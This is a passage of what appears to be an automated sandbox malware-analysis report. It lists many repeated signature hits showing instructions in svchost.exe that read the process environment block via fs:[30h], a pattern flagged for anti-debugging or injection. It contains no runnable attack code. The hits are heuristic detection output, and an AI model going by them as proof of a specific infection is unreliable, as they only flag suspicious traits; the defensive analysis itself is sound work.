            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]2_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]2_2_0346C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]2_2_034666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]2_2_034C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]2_2_034365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]2_2_034325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]2_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]2_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]2_2_03464588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]2_2_0346E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]2_2_034EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]2_2_0342645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]2_2_0345245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]2_2_034BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]2_2_0342C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]2_2_0346A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]2_2_034304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]2_2_034EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]2_2_034364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]2_2_034644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]2_2_034BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]2_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]2_2_034D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]2_2_03428B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]2_2_034DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]2_2_0342CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]2_2_03504B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]2_2_034DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]2_2_0345EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]2_2_034BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]2_2_034DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]2_2_034BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]2_2_0346CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]2_2_0345EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]2_2_0346CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]2_2_03430AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]2_2_03504A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]2_2_03468A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]2_2_03486AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]2_2_034B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504940 mov eax, dword ptr fs:[00000030h]2_2_03504940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]2_2_034BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]2_2_034BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]2_2_034B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]2_2_034C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]2_2_034C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]2_2_034649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]2_2_034FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]2_2_034BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
